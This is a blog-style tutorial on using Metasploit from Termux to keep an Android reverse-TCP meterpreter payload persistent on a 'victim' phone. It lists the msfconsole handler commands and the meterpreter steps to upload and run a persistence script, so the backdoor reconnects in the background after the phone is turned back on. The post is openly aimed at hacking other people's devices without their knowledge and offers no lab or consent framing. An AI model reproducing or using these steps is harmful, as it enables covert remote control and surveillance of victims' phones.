Banner ads

persistent payload tutorial in termux

persistent payload tutorial in termux - Hi guys if you are searching for persistent payload tutorial in termux and searching for the best article to get the best explanation about persistent payload tutorial in termux. Then you are in the right place.

Today I'm here going to share the step by step tutorial about "peristant payload in termux metasploit". By this article, you can get a lot of about how to make persistent payload, how to hack android, hacking from termux. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.

peristent payload tutorial in termux
peristent payload tutorial in termux

persistent payload tutorial in termux

Hello, guy's iam back with another amazing post so in this post, we will get to know about how to make a Metasploit payload persistent from simple bash script with simple steps. So now let's go through the practical part.

#Follow below step's


1. Create Payload and send it to your victim when hi install it opens it you will get the session every time when he opens the payload. Now for that tutorial ( Click Here )

2. Download bash persistent file from here and move this to your internal storage ( Click Here )


#STEP 1 (START MSFCONSOLE AND CHECK SESSION)


$ cd $HOME/metasploit-framework

$ ./msfconsole


now open new (2nd) session and apply these commands


$  pg_ctl -D $PREFIX/var/lib/postgresql start


now come back to (1st session) in which you opened Metasploit now apply these commands.


$ db_status


$ use exploit/multi/handler


$ set payload android/meterpreter/reverse_tcp


$ set lhost (your ip here) or portmap host address


$ set lport (the port you gave)


$ exploit


#STEP 2 (UPLOADING PERSISTENT SCRIPT AND EXECUTING) 


Now when you get meterpreter session of your victim device to follow the below steps to upload persistent script and to make payload persistent on the victim device.


Ex :-


meterpreter> upload /sdcard/syslogs.sh  /sdcard


(Nowhere the persistent script will be uploaded to your victim's device internal storage)


meterpreter> cd /sdcard


meterpreter> ls


meterpreter> shell


meterpreter> ls


(Nowhere your victim's internal storage will be shown so here check if Syslogs.sh file is present or not if not then repeat the step1. if it is present then you can follow below step)


meterpreter> sh syslogs.sh


(Nowhere the process of persistent activity takes 10 Minutes after ten minutes you can exit from the process)


#STEP 3 (CHECKING PAYLOAD ACTIVITY AFTER RESTART)



It's time to check our payload persistent in the victim's device. So whenever our victim (target) turns on or off his mobile phone and when he turns on his device, the payload will automatically start in the background and when he turned on his internet connection you will get session without clicking on the payload. So you can try step1 to get meterpreter session every time without any issue. And this persistent works only one time till the android reboot's after that it will stop working so you have to execute the script once again whenever the target device restarts. So guys that's all for today so I hope guys you liked this post then don't forget to share this with your buddies.


how to use Metasploit in termux in pdf version

English ----> Click Here 
Kannada ----> Click Here
Tamil ----> Click Here
Urdu ----> Click Here
Hindi ----> Click Here



 websites I used in the video

Click Here


watch the practical video here ( part 1 )

Click Here

watch the practical video here ( part 2 )

Click Here

watch the practical video here ( part 3 )

Click Here

watch the practical video here ( part 4 )

Click Here

watch the practical video here ( part 5 )

Click Here

watch the practical video here ( part 6 )

Click Here

watch the practical video here ( part 7 )


 Follow this carefully
Please don't skip the video ...
So guys follow the steps as I showed from starting of the video to the end of the video ok. So after all, if you are facing any problem then comment or use contact us page, please........

Errors or issue reasons

  • Command error 

  • Data connection problem 

  • Big letters using in commands 

  • Giving more space b/n words 

  • lack of patience

    "Solution for all these problems is watching a video without skip until the end"

    Link for video will be available below
    Click On Below Button


    Post a Comment

    0 Comments